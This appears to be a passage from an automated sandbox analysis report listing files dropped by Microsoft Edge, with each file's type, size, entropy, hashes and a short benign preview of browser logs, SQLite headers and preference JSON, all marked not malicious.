                                                                                                                                                                Preview:2025/01/09-08:42:45.911 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:45.913 770 Recovering log #3.2025/01/09-08:42:45.916 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):425
                                                                                                                                                                Entropy (8bit):5.263495318842846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7KlY1yvLZYebvqBZFUt0l+J/WlBR54ZYebvqBaJ:70iYlYebvygO+iBDoYebvL
                                                                                                                                                                MD5:D6B0F7158A5E02EC06C3EABD980BB7B3
                                                                                                                                                                SHA1:D1BB4A030F62713FD0C6C5297CF376705CA631F2
                                                                                                                                                                SHA-256:F20C313905129877A288F30E6B16517BE714A7B4D7AB4F7E4766CC6E935AC466
                                                                                                                                                                SHA-512:465686F10A2B5A8958293652A12DF0C1C2CD63FA7284B09ABD0B9E85172E57329AC8E143C3793A1DBE9E7D9CAC1A25F7B546B097479E2F99BBF11D26A039ADB3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:45.911 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:42:45.913 770 Recovering log #3.2025/01/09-08:42:45.916 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
Category:dropped
Size (bytes):334
Entropy (8bit):5.190938817272335
Encrypted:false
SSDEEP:6:iOrvRkH0FN+q2PcNwi23oH+TcwtpIFUtJvRPeAWZmwPvRPe3VkwOcNwi23oH+TcM:7SUFN+vLZYebmFUtPPW/NKV54ZYebaUJ
MD5:084F19BEDD3828AD9553BA13B1694B6E
SHA1:84DDDA91D9DA175A832B31FA059014E027BA02B5
SHA-256:F18FFDC95FB0FDFA6BCD154E0BE06A7F3C9B17B87ECE685E1D8DB408A6611524
SHA-512:A57FC1AC430D7F8DFD3886AD2CBA71E93092D12920905CC865F53EEC5778613A0FD3C2B4F34F2CF191D52F9C887105FF1D1A2490C45B482F30E935CEAAC03020
Malicious:false
Preview:2025/01/09-08:42:28.128 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:28.130 1dec Recovering log #3.2025/01/09-08:42:28.130 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):334
Entropy (8bit):5.190938817272335
Encrypted:false
SSDEEP:6:iOrvRkH0FN+q2PcNwi23oH+TcwtpIFUtJvRPeAWZmwPvRPe3VkwOcNwi23oH+TcM:7SUFN+vLZYebmFUtPPW/NKV54ZYebaUJ
MD5:084F19BEDD3828AD9553BA13B1694B6E
SHA1:84DDDA91D9DA175A832B31FA059014E027BA02B5
SHA-256:F18FFDC95FB0FDFA6BCD154E0BE06A7F3C9B17B87ECE685E1D8DB408A6611524
SHA-512:A57FC1AC430D7F8DFD3886AD2CBA71E93092D12920905CC865F53EEC5778613A0FD3C2B4F34F2CF191D52F9C887105FF1D1A2490C45B482F30E935CEAAC03020
Malicious:false
Preview:2025/01/09-08:42:28.128 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:28.130 1dec Recovering log #3.2025/01/09-08:42:28.130 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:dropped
Size (bytes):196608
Entropy (8bit):1.2652848714957459
Encrypted:false
SSDEEP:384:KrJ/2qOB1nxCkMdSAELyKOMq+8HKkjucswRv8p3nVumJ:K0q+n0Jd9ELyKOMq+8HKkjuczRv89F
MD5:A43BFC1C69B4D660F978F13FED603AB8
SHA1:FF23E244A7D1C20BBC7EE6AEB87424EB871F4CF7
SHA-256:9387611919CF800DDDBC4CA7465CF9C5E1DD9A5B3D4E73F5A464026012F6EDBE
SHA-512:DE5C958CDD55FD7FD7CC5E41296D2FE45EEB5F08E6C0F46EE090C25D771B1E5BB35428D34F34A731413B7CA1A628685100A7D8EB5D5ACE4D2D6FED7E0D526839
Malicious:false
Preview:SQLite format 3......@ .......[...........6......................................................j............W...
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.46670540393918675
Encrypted:false
SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0L/KQIV:v7doKsKuKZKlZNmu46yjx0LDIV
MD5:EB34B1AA4B89DC26D5C087F53534746D
SHA1:E93A4B1314F1C3B33BDED50273805DE54EAD77DE
SHA-256:2926AE68CD5BC1DCAB5609C13396889BCBE6F314CCB05BED5768281A03AEE984
SHA-512:C79FD4953FB5AB465D5AB37DC9E37870263D1C5426C4783FEF560732CE4F3017ABC6F77788DC731B64E6EF6B8FF2834E72CD9941D5CE9797A5474715B0D13FD0
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w...
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (3951), with CRLF line terminators
Category:dropped
Size (bytes):11755
Entropy (8bit):5.190465908239046
Encrypted:false
SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:07301A857C41B5854E6F84CA00B81EA0
SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:false
Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):13579
Entropy (8bit):5.2294340074227135
Encrypted:false
SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
MD5:8CFF09EAA1EE613FDE28851350D9577B
SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):28672
Entropy (8bit):0.3410017321959524
Encrypted:false
SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:98643AF1CA5C0FE03CE8C687189CE56B
SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g.....P...
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (1597), with CRLF line terminators
Category:dropped
Size (bytes):115717
Entropy (8bit):5.183660917461099
Encrypted:false
SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:3D8183370B5E2A9D11D43EBEF474B305
SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:false
Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (16793), with no line terminators
Category:dropped
Size (bytes):16793
Entropy (8bit):5.446679933619079
Encrypted:false
SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kcYCBAXx3uaqBp0B12s8IbV+FmWQwW9Z5:st/PGKSu4BsMHtJ4XpXqBpYXbGnQwI
MD5:EEC801F7A31803E706A89A32B9A362F9
SHA1:7E7AB3A8B5FFA3BB0F3D9D31580C7C9AF25FFA54
SHA-256:0EA84E86972E2D60BBB4FF9208ED1AF7DC9E30AF2D5F898FCF1700A7BEDF0B41
SHA-512:CF71D8EE4E772A5CF29ED8EB8552D0450DD17EEC7A0A82FD8FA05FFD0822E736F0494A9928BFF8C81BF94C9553FFF9AD0E5B8A34838C7D86DF6E57D96549489A
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (17550), with no line terminators
Category:dropped
Size (bytes):17550
Entropy (8bit):5.483187850962429
Encrypted:false
SSDEEP:384:st/PGKSu4BsMHtJjdGXpXqBpYXbGnQwiK:sROxueHxopBbGQg
MD5:71494FB2660D70EA2CAFF9065FBC2863
SHA1:7F24EB325E90D91137808B4347ABEF43D3F2C205
SHA-256:A205166C7E50E61F2B578211D9C2608477C21417A61F072F529C1470FA480D85
SHA-512:17F00CA8D928C0C00D79EB4A5C408AC3CC4BDD63F52EE66DC3770453E651CBD19FB6FB9E2A0D9FBE1E3146017D160F541D747EF928372A712E3327E6AFCA0EE5
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                Entropy (8bit):0.10246804483081562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Gu0glBsQtu0glBsx89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+p4pxspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                MD5:F91873781862CA71C3AF533492E21DAE
                                                                                                                                                                SHA1:A7115C83CB76867159479E78CA58B88B77EE5025
                                                                                                                                                                SHA-256:FE47C4F9D735ACB036B995CAB0D74E0082C26121901D512138DE5D3D875DA9B8
                                                                                                                                                                SHA-512:47DC3AB030EF76B39596B02783512ADB405EB8B7360B87F9449ADB0152A3F5DEBADBAFB84303451A4B5965C1508A2A23CEA5B48603A302E1D9B43BBD49528745
                                                                                                                                                                Malicious:false
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                Entropy (8bit):0.8887125838325957
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:YfVVoWG3iVIyOaHyNHXE6AP1EDv87yKyh/y5yubyjxy3s:qVed
                                                                                                                                                                MD5:1740E4D9C2CCFEDCE66E287DB7B5CC2F
                                                                                                                                                                SHA1:64358E8CDBB5652B3AAEC1BC4BDC4009E2CA95A1
                                                                                                                                                                SHA-256:C077677DB554207C8D63FCF7D63387A6FA85E6BF37875708FFF53F25944D043B
                                                                                                                                                                SHA-512:6C6CFE7B9FEBFC6216A4CF211072CEF691F633BCDCDD26D2620DF58F54CA8FC993B520360BFBE7AF30319F812DF8435FBC4955B7AE0FE1E1DA1F6FBE951C188A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):419
                                                                                                                                                                Entropy (8bit):3.6916294183852694
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuGBsedhOm:llc8BOuuuuuuuuuuuub8n
                                                                                                                                                                MD5:D19B25F7708AC9F672687B3D7C9A0752
                                                                                                                                                                SHA1:7D69F899E226548F59CE6CF16748D7608083C1E2
                                                                                                                                                                SHA-256:F84FBD78D66B2BE1036CB3154591C7819CBED2500FF41F4743D7B2A72BC0F505
                                                                                                                                                                SHA-512:19F233052BBFB1AED28B70B60E8AE6FF938DA07A64502CEC3808CA66C80FD4C0BA50DFBE3B4FA14C7C90715DE4E82F180E75A4CA65799A9E5C84EA57E279882A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.241914114446308
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRIYVq2PcNwi23oH+TcwtfrK+IFUtJvRygZmwPvRyIkwOcNwi23oH+TcwtfrF:7eAvLZYeb23FUt3//54ZYeb3J
                                                                                                                                                                MD5:8F8A707F5323738B8D8DEA5C1909C8CD
                                                                                                                                                                SHA1:82197085FFB478C47C406A7E23DF2BBE5C97704C
                                                                                                                                                                SHA-256:4AF8FF0B5CFA890E30D938AD4B3887710EBDD2B256A11F0C69FE1A1F4BAA4AD0
                                                                                                                                                                SHA-512:9C9553743AD5B8FD63BD29E99714904DE8808D7ECB54E98FB958658DE7C428A5888A71C91C7CCCAE6028AAD9EDD57EA7F8D4F708F90B52ACF587BEBCED3D19C1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.647 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.648 680 Recovering log #3.2025/01/09-08:42:28.648 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.241914114446308
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRIYVq2PcNwi23oH+TcwtfrK+IFUtJvRygZmwPvRyIkwOcNwi23oH+TcwtfrF:7eAvLZYeb23FUt3//54ZYeb3J
                                                                                                                                                                MD5:8F8A707F5323738B8D8DEA5C1909C8CD
                                                                                                                                                                SHA1:82197085FFB478C47C406A7E23DF2BBE5C97704C
                                                                                                                                                                SHA-256:4AF8FF0B5CFA890E30D938AD4B3887710EBDD2B256A11F0C69FE1A1F4BAA4AD0
                                                                                                                                                                SHA-512:9C9553743AD5B8FD63BD29E99714904DE8808D7ECB54E98FB958658DE7C428A5888A71C91C7CCCAE6028AAD9EDD57EA7F8D4F708F90B52ACF587BEBCED3D19C1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.647 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.648 680 Recovering log #3.2025/01/09-08:42:28.648 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):782
                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                Malicious:false
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):345
                                                                                                                                                                Entropy (8bit):5.22197671452259
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR2Vq2PcNwi23oH+TcwtfrzAdIFUtJvR+wgZmwPvR+wIkwOcNwi23oH+TcwtS:7EvLZYeb9FUta/w54ZYeb2J
                                                                                                                                                                MD5:22565D9EDBBF4FF82330C8B42D2F4D8F
                                                                                                                                                                SHA1:935445FC744CFC3A51B59F1DFC4ED614190D1B04
                                                                                                                                                                SHA-256:8216241F8D34A04FDDD5589CEAA16AAE9C440140BBDEE4BCC600816BF9D93525
                                                                                                                                                                SHA-512:51E3A84DB8BA688E1FC3957CF9B9E1600410F4B2C2F88D21957FDDC69C846FCF6B416853FD6019D411607D80DC4324720C66BE8DED256BB121089884073AD779
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.644 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.645 680 Recovering log #3.2025/01/09-08:42:28.645 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):345
                                                                                                                                                                Entropy (8bit):5.22197671452259
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR2Vq2PcNwi23oH+TcwtfrzAdIFUtJvR+wgZmwPvR+wIkwOcNwi23oH+TcwtS:7EvLZYeb9FUta/w54ZYeb2J
                                                                                                                                                                MD5:22565D9EDBBF4FF82330C8B42D2F4D8F
                                                                                                                                                                SHA1:935445FC744CFC3A51B59F1DFC4ED614190D1B04
                                                                                                                                                                SHA-256:8216241F8D34A04FDDD5589CEAA16AAE9C440140BBDEE4BCC600816BF9D93525
                                                                                                                                                                SHA-512:51E3A84DB8BA688E1FC3957CF9B9E1600410F4B2C2F88D21957FDDC69C846FCF6B416853FD6019D411607D80DC4324720C66BE8DED256BB121089884073AD779
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.644 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.645 680 Recovering log #3.2025/01/09-08:42:28.645 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):120
                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13
                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:117.0.2045.47
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.6773696719930975
